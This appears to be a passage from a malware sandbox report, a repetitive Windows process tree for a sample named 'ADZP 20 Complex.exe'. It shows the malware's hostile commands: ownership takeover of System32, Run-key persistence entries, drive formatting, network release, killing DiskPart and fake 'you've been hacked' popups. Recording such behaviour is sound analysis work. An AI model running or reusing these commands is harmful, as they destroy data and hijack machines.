PID:3232

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ErrorCritico.vbs"
5⤵
PID:3580

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Advertencia.vbs"
5⤵
PID:3992

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ErrorCritico.vbs"
5⤵
PID:3300

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Advertencia.vbs"
5⤵
PID:3980

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ErrorCritico.vbs"
5⤵
PID:3436

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Advertencia.vbs"
5⤵
PID:3308

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ErrorCritico.vbs"
5⤵
PID:2056

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Advertencia.vbs"
5⤵
PID:3828

C:\Windows\system32\msg.exe
msg * Virus Detectado
5⤵
PID:3808

C:\Windows\system32\msg.exe
msg * Virus Detectado
5⤵
PID:3132

C:\Windows\system32\msg.exe
msg * Has Sido Hackeado!
5⤵
PID:3496

C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe
"C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe"
5⤵
- Executes dropped EXE
- Suspicious behavior: CmdExeWriteProcessMemorySpam
PID:3568

C:\Windows\system32\cmd.exe
"C:\Windows\sysnative\cmd" /c "C:\Users\Admin\AppData\Local\Temp\C11D.tmp\C11E.tmp\C11F.bat "C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe""
6⤵
PID:5668

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K Twain_20.cmd
7⤵
PID:5852

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K Twain_20.cmd
7⤵
PID:5860

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Informacion.vbs"
7⤵
PID:3944

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K Taskdl.bat
7⤵
PID:5928

C:\Windows\system32\takeown.exe
takeown /f "C:\Windows\System32" /r
8⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:6692

C:\Windows\system32\reg.exe
reg add hkey_local_machinesoftwaremicrosoftwindowscurrentversionrun /v WINDOWsAPI /t reg_sz /d c:windowswimn32.bat /f
7⤵
PID:6000

C:\Windows\system32\reg.exe
reg add hkey_current_usersoftwaremicrosoftwindowscurrentversionrun /v CONTROLexit /t reg_sz /d c:windowswimn32.bat /f
7⤵
PID:2832

C:\Windows\system32\ipconfig.exe
ipconfig /release
7⤵
- Gathers network information
PID:5976

C:\Windows\system32\taskkill.exe
taskkill /im DiskPart /f
7⤵
- Kills process with taskkill
PID:6188

C:\Windows\system32\attrib.exe
attrib -r -a -s -h *.*
7⤵
- Views/modifies file attributes
PID:7368

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ErrorCritico.vbs"
7⤵
PID:7996

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Advertencia.vbs"
7⤵
PID:6620

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ErrorCritico.vbs"
7⤵
PID:8920

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Advertencia.vbs"
7⤵
PID:7796

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ErrorCritico.vbs"
7⤵
PID:6060

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Advertencia.vbs"
7⤵
PID:9352

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ErrorCritico.vbs"
7⤵
PID:9348

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Advertencia.vbs"
7⤵
PID:6656

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ErrorCritico.vbs"
7⤵
PID:1176

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Advertencia.vbs"
7⤵
PID:12668

C:\Windows\system32\msg.exe
msg * Virus Detectado
7⤵
PID:12748

C:\Windows\system32\msg.exe
msg * Virus Detectado
7⤵
PID:10608

C:\Windows\system32\msg.exe
msg * Has Sido Hackeado!
7⤵
PID:14216

C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe
"C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe"
7⤵
PID:14432

C:\Windows\system32\notepad.exe
notepad
7⤵
PID:14480

C:\Windows\system32\calc.exe
calc
7⤵
PID:14592

C:\Windows\explorer.exe
explorer.exe
7⤵
PID:14648

C:\Windows\system32\mspaint.exe
mspaint.exe
7⤵
PID:14716

C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe
"C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe"
7⤵
PID:14788

C:\Windows\system32\notepad.exe
notepad
7⤵
PID:15072

C:\Windows\system32\calc.exe
calc
7⤵
PID:15152

C:\Windows\explorer.exe
explorer.exe
7⤵
PID:15196

C:\Windows\system32\mspaint.exe
mspaint.exe
7⤵
PID:15236

C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe
"C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe"
7⤵
PID:15280

C:\Windows\system32\notepad.exe
notepad
7⤵
PID:11076

C:\Windows\system32\calc.exe
calc
7⤵
PID:10996

C:\Windows\explorer.exe
explorer.exe
7⤵
PID:8220

C:\Windows\system32\mspaint.exe
mspaint.exe
7⤵
PID:10712

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ErrorCritico.vbs"
7⤵
PID:14948

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Advertencia.vbs"
7⤵
PID:7728

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ErrorCritico.vbs"
7⤵
PID:18004

C:\Windows\system32\notepad.exe
notepad
5⤵
PID:3900

C:\Windows\system32\calc.exe
calc
5⤵
PID:3768

C:\Windows\explorer.exe
explorer.exe
5⤵
PID:3624

C:\Windows\system32\mspaint.exe
mspaint.exe
5⤵
- Drops file in Windows directory
- Suspicious use of SetWindowsHookEx
PID:3796

C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe
"C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe"
5⤵
- Executes dropped EXE
- Suspicious behavior: CmdExeWriteProcessMemorySpam
PID:3844

C:\Windows\system32\cmd.exe
"C:\Windows\sysnative\cmd" /c "C:\Users\Admin\AppData\Local\Temp\C255.tmp\C256.tmp\C257.bat "C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe""
6⤵
PID:5684

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K Twain_20.cmd
7⤵
PID:6104

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K Twain_20.cmd
7⤵
PID:188

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Informacion.vbs"
7⤵
PID:6124

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K Taskdl.bat
7⤵
PID:2772

C:\Windows\system32\takeown.exe
takeown /f "C:\Windows\System32" /r
8⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:6716

C:\Windows\system32\reg.exe
reg add hkey_local_machinesoftwaremicrosoftwindowscurrentversionrun /v WINDOWsAPI /t reg_sz /d c:windowswimn32.bat /f
7⤵
PID:3540

C:\Windows\system32\reg.exe
reg add hkey_current_usersoftwaremicrosoftwindowscurrentversionrun /v CONTROLexit /t reg_sz /d c:windowswimn32.bat /f
7⤵
PID:4336

C:\Windows\system32\ipconfig.exe
ipconfig /release
7⤵
- Gathers network information
PID:6156

C:\Windows\system32\taskkill.exe
taskkill /im DiskPart /f
7⤵
- Kills process with taskkill
PID:6264

C:\Windows\system32\attrib.exe
attrib -r -a -s -h *.*
7⤵
- Views/modifies file attributes
PID:7396

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ErrorCritico.vbs"
7⤵
PID:7920

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Advertencia.vbs"
7⤵
PID:5356

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ErrorCritico.vbs"
7⤵
PID:8800

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Advertencia.vbs"
7⤵
PID:8224

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ErrorCritico.vbs"
7⤵
PID:8932

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Advertencia.vbs"
7⤵
PID:7452

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ErrorCritico.vbs"
7⤵
PID:9764

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Advertencia.vbs"
7⤵
PID:10348

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ErrorCritico.vbs"
7⤵
PID:11976

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Advertencia.vbs"
7⤵
PID:13040

C:\Windows\system32\msg.exe
msg * Virus Detectado
7⤵
PID:13184

C:\Windows\system32\msg.exe
msg * Virus Detectado
7⤵
PID:12512

C:\Windows\system32\msg.exe
msg * Has Sido Hackeado!
7⤵
PID:13448

C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe
"C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe"
7⤵
PID:14304

C:\Windows\system32\notepad.exe
notepad
7⤵
PID:12516

C:\Windows\system32\calc.exe
calc
7⤵
PID:9420

C:\Windows\explorer.exe
explorer.exe
7⤵
PID:13724

C:\Windows\system32\mspaint.exe
mspaint.exe
7⤵
PID:10224

C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe
"C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe"
7⤵
PID:14004

C:\Windows\system32\notepad.exe
notepad
7⤵
PID:14040

C:\Windows\system32\calc.exe
calc
7⤵
PID:14184

C:\Windows\explorer.exe
explorer.exe
7⤵
PID:14236

C:\Windows\system32\mspaint.exe
mspaint.exe
7⤵
PID:13448

C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe
"C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe"
7⤵
PID:9224

C:\Windows\system32\notepad.exe
notepad
7⤵
PID:10492

C:\Windows\system32\calc.exe
calc
7⤵
PID:14020

C:\Windows\explorer.exe
explorer.exe
7⤵
PID:9092

C:\Windows\system32\mspaint.exe
mspaint.exe
7⤵
PID:11060

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ErrorCritico.vbs"
7⤵
PID:14996

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Advertencia.vbs"
7⤵
PID:11844

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ErrorCritico.vbs"
7⤵
PID:17092

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Advertencia.vbs"
7⤵
PID:14132

C:\Windows\system32\notepad.exe
notepad
5⤵
PID:3860

C:\Windows\system32\calc.exe
calc
5⤵
PID:3344

C:\Windows\explorer.exe
explorer.exe
5⤵
PID:4032

C:\Windows\system32\mspaint.exe
mspaint.exe
5⤵
- Drops file in Windows directory
- Suspicious use of SetWindowsHookEx
PID:3912

C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe
"C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe"
5⤵
- Executes dropped EXE
- Suspicious behavior: CmdExeWriteProcessMemorySpam
PID:3936

C:\Windows\system32\cmd.exe
"C:\Windows\sysnative\cmd" /c "C:\Users\Admin\AppData\Local\Temp\C2B3.tmp\C2B4.tmp\C2B5.bat "C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe""
6⤵
PID:5696

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K Twain_20.cmd
7⤵
PID:5744

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K Twain_20.cmd
7⤵
PID:5816

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Informacion.vbs"
7⤵
PID:5772

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K Taskdl.bat
7⤵
PID:6068

C:\Windows\system32\takeown.exe
takeown /f "C:\Windows\System32" /r
8⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:6708

C:\Windows\system32\reg.exe
reg add hkey_local_machinesoftwaremicrosoftwindowscurrentversionrun /v WINDOWsAPI /t reg_sz /d c:windowswimn32.bat /f
7⤵
PID:2196

C:\Windows\system32\reg.exe
reg add hkey_current_usersoftwaremicrosoftwindowscurrentversionrun /v CONTROLexit /t reg_sz /d c:windowswimn32.bat /f
7⤵
PID:632

C:\Windows\system32\ipconfig.exe
ipconfig /release
7⤵
- Gathers network information
PID:2604

C:\Windows\system32\taskkill.exe
taskkill /im DiskPart /f
7⤵
- Kills process with taskkill
PID:6228

C:\Windows\system32\attrib.exe
attrib -r -a -s -h *.*
7⤵
- Views/modifies file attributes
PID:7520

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ErrorCritico.vbs"
7⤵
PID:4388

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Advertencia.vbs"
7⤵
PID:8472

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ErrorCritico.vbs"
7⤵
PID:8652

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Advertencia.vbs"
7⤵
PID:8428

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ErrorCritico.vbs"
7⤵
PID:9192

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Advertencia.vbs"
7⤵
PID:10192

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ErrorCritico.vbs"
7⤵
PID:10792

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Advertencia.vbs"
7⤵
PID:11536

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ErrorCritico.vbs"
7⤵
PID:12772

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Advertencia.vbs"
7⤵
PID:9980

C:\Windows\system32\msg.exe
msg * Virus Detectado
7⤵
PID:8212

C:\Windows\system32\msg.exe
msg * Virus Detectado
7⤵
PID:14156

C:\Windows\system32\msg.exe
msg * Has Sido Hackeado!
7⤵
PID:14516

C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe
"C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe"
7⤵
PID:10524

C:\Windows\system32\notepad.exe
notepad
7⤵
PID:14992

C:\Windows\system32\calc.exe
calc
7⤵
PID:8680

C:\Windows\explorer.exe
explorer.exe
7⤵
PID:14520

C:\Windows\system32\mspaint.exe
mspaint.exe
7⤵
PID:6004

C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe
"C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe"
7⤵
PID:14988

C:\Windows\system32\notepad.exe
notepad
7⤵
PID:9684

C:\Windows\system32\calc.exe
calc
7⤵
PID:15532

C:\Windows\explorer.exe
explorer.exe
7⤵
PID:15776

C:\Windows\system32\mspaint.exe
mspaint.exe
7⤵
PID:16048

C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe
"C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe"
7⤵
PID:16136

C:\Windows\system32\notepad.exe
notepad
7⤵
PID:16172

C:\Windows\system32\calc.exe
calc
7⤵
PID:16276

C:\Windows\explorer.exe
explorer.exe
7⤵
PID:15516

C:\Windows\system32\mspaint.exe
mspaint.exe
7⤵
PID:15528

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ErrorCritico.vbs"
7⤵
PID:16380

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Advertencia.vbs"
7⤵
PID:3672

C:\Windows\system32\notepad.exe
notepad
5⤵
PID:3960

C:\Windows\system32\calc.exe
calc
5⤵
PID:3808

C:\Windows\explorer.exe
explorer.exe
5⤵
PID:952

C:\Windows\system32\mspaint.exe
mspaint.exe
5⤵
- Drops file in Windows directory
- Suspicious use of SetWindowsHookEx
PID:3532

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ErrorCritico.vbs"
5⤵
PID:4288

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Advertencia.vbs"
5⤵
PID:4576

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ErrorCritico.vbs"
5⤵
PID:4380

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Advertencia.vbs"
5⤵
PID:4544

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ErrorCritico.vbs"
5⤵
PID:4340

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Advertencia.vbs"
5⤵
PID:3280

C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe
"C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe"
5⤵
PID:5832

C:\Windows\system32\notepad.exe
notepad
5⤵
PID:8860

C:\Windows\system32\calc.exe
calc
5⤵
PID:13012

C:\Windows\explorer.exe
explorer.exe
5⤵
PID:13272

C:\Windows\system32\mspaint.exe
mspaint.exe
5⤵
PID:12340

C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe
"C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe"
5⤵
PID:9188

C:\Windows\system32\notepad.exe
notepad
5⤵
PID:12532

C:\Windows\system32\calc.exe
calc
5⤵
PID:13168

C:\Windows\explorer.exe
explorer.exe
5⤵
PID:8752

C:\Windows\system32\mspaint.exe
mspaint.exe
5⤵
PID:13076

C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe
"C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe"
5⤵
PID:12480

C:\Windows\system32\notepad.exe
notepad
5⤵
PID:5464

C:\Windows\system32\calc.exe
calc
5⤵
PID:10668

C:\Windows\explorer.exe
explorer.exe
5⤵
PID:8544

C:\Windows\system32\mspaint.exe
mspaint.exe
5⤵
PID:12352

C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe
"C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe"
5⤵
PID:7828

C:\Windows\system32\notepad.exe
notepad
5⤵
PID:10112

C:\Windows\system32\calc.exe
calc
5⤵
PID:13332

C:\Windows\explorer.exe
explorer.exe
5⤵
PID:13380

C:\Windows\system32\mspaint.exe
mspaint.exe
5⤵
PID:13396

C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe
"C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe"
5⤵
PID:13420

C:\Windows\system32\notepad.exe
notepad
5⤵
PID:13480

C:\Windows\system32\calc.exe
calc
5⤵
PID:13640

C:\Windows\explorer.exe
explorer.exe
5⤵
PID:13676

C:\Windows\system32\mspaint.exe
mspaint.exe
5⤵
PID:13704

C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe
"C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe"
5⤵
PID:13748

C:\Windows\system32\notepad.exe
notepad
5⤵
PID:13816

C:\Windows\system32\calc.exe
calc
5⤵
PID:13880

C:\Windows\explorer.exe
explorer.exe
5⤵
PID:13924

C:\Windows\system32\mspaint.exe
mspaint.exe
5⤵
PID:13948

C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe
"C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe"
5⤵
PID:7100

C:\Windows\system32\notepad.exe
notepad
5⤵
PID:6608

C:\Windows\system32\calc.exe
calc
5⤵
PID:14048

C:\Windows\explorer.exe
explorer.exe
5⤵
PID:8228

C:\Windows\system32\mspaint.exe
mspaint.exe
5⤵
PID:12704

C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe
"C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe"
5⤵
PID:13520

C:\Windows\system32\notepad.exe
notepad
5⤵
PID:8052

C:\Windows\system32\calc.exe
calc
5⤵
PID:13524

C:\Windows\explorer.exe
explorer.exe
5⤵
PID:11012

C:\Windows\system32\mspaint.exe
mspaint.exe
5⤵
PID:14440

C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe
"C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe"
5⤵
PID:14492

C:\Windows\system32\notepad.exe
notepad
5⤵
PID:14608

C:\Windows\system32\calc.exe
calc
5⤵
PID:14664

C:\Windows\explorer.exe
explorer.exe
5⤵
PID:14724

C:\Windows\system32\mspaint.exe
mspaint.exe
5⤵
PID:14812

C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe
"C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe"
5⤵
PID:14848

C:\Windows\system32\notepad.exe
notepad
5⤵
PID:14920

C:\Windows\system32\calc.exe
calc
5⤵
PID:15104

C:\Windows\explorer.exe
explorer.exe
5⤵
PID:15168

C:\Windows\system32\mspaint.exe
mspaint.exe
5⤵
PID:15248

C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe
"C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe"
5⤵
PID:15304

C:\Windows\system32\notepad.exe
notepad
5⤵
PID:14160

C:\Windows\system32\calc.exe
calc
5⤵
PID:14076

C:\Windows\explorer.exe
explorer.exe
5⤵
PID:15004

C:\Windows\system32\mspaint.exe
mspaint.exe
5⤵
PID:10596

C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe
"C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe"
5⤵
PID:10576

C:\Windows\system32\notepad.exe
notepad
5⤵
PID:10840

C:\Windows\system32\calc.exe
calc
5⤵
PID:14588

C:\Windows\explorer.exe
explorer.exe
5⤵
PID:14980

C:\Windows\system32\mspaint.exe
mspaint.exe
5⤵
PID:11224

C:\Windows\system32\icacls.exe
icacls "C:\Program Files"
5⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:10468

C:\Windows\system32\attrib.exe
attrib -r -a -s -h "C:\Program Files"
5⤵
- Views/modifies file attributes
PID:15664

C:\Windows\system32\format.com
format /y /q A:
5⤵
PID:17220

C:\Windows\system32\format.com
format /y /q B:
5⤵
PID:17544

C:\Windows\system32\notepad.exe
notepad
3⤵
PID:796

C:\Windows\system32\calc.exe
calc
3⤵
PID:2120

C:\Windows\explorer.exe
explorer.exe
3⤵
PID:2264

C:\Windows\system32\mspaint.exe
mspaint.exe
3⤵
- Drops file in Windows directory
- Suspicious use of SetWindowsHookEx
PID:1664

C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe
"C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe"
3⤵
- Executes dropped EXE
- Suspicious behavior: CmdExeWriteProcessMemorySpam
PID:1548

C:\Windows\system32\cmd.exe
"C:\Windows\sysnative\cmd" /c "C:\Users\Admin\AppData\Local\Temp\2F3B.tmp\2F3C.tmp\2F3D.bat "C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe""
4⤵
- Drops autorun.inf file
- Drops file in System32 directory
PID:2076

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K Twain_20.cmd
5⤵
PID:2064

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K Twain_20.cmd
5⤵
PID:996

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Informacion.vbs"
5⤵
PID:1408

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K Taskdl.bat
5⤵
PID:608

C:\Windows\system32\takeown.exe
takeown /f "C:\Windows\System32" /r
6⤵
- Possible privilege escalation attempt
- Modifies file permissions
- Suspicious use of AdjustPrivilegeToken
PID:752

C:\Windows\system32\reg.exe
reg add hkey_local_machinesoftwaremicrosoftwindowscurrentversionrun /v WINDOWsAPI /t reg_sz /d c:windowswimn32.bat /f
5⤵
PID:976

C:\Windows\system32\reg.exe
reg add hkey_current_usersoftwaremicrosoftwindowscurrentversionrun /v CONTROLexit /t reg_sz /d c:windowswimn32.bat /f
5⤵
PID:2380

C:\Windows\system32\ipconfig.exe
ipconfig /release
5⤵
- Gathers network information
PID:2832

C:\Windows\system32\taskkill.exe
taskkill /im DiskPart /f
5⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:2592

C:\Windows\system32\attrib.exe
attrib -r -a -s -h *.*
5⤵
- Drops autorun.inf file
- Views/modifies file attributes
PID:1324

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ErrorCritico.vbs"
5⤵
PID:3096

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Advertencia.vbs"
5⤵
PID:3332

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ErrorCritico.vbs"
5⤵
PID:3732

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Advertencia.vbs"
5⤵
PID:1160

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ErrorCritico.vbs"
5⤵
PID:3588

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Advertencia.vbs"
5⤵
PID:3112

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ErrorCritico.vbs"
5⤵
PID:3800

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Advertencia.vbs"
5⤵
PID:3560

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ErrorCritico.vbs"
5⤵
PID:3292

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Advertencia.vbs"
5⤵
PID:4080

C:\Windows\system32\msg.exe
msg * Virus Detectado
5⤵
PID:4084

C:\Windows\system32\msg.exe
msg * Virus Detectado
5⤵
PID:3168

C:\Windows\system32\msg.exe
msg * Has Sido Hackeado!
5⤵
PID:3532

C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe
"C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe"
5⤵
- Executes dropped EXE
- Suspicious behavior: CmdExeWriteProcessMemorySpam
PID:3948

C:\Windows\system32\cmd.exe
"C:\Windows\sysnative\cmd" /c "C:\Users\Admin\AppData\Local\Temp\C2B4.tmp\C2B4.tmp\C2B5.bat "C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe""
6⤵
PID:5708

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K Twain_20.cmd
7⤵
PID:5792

C:\Windows\system32\cmd.exe
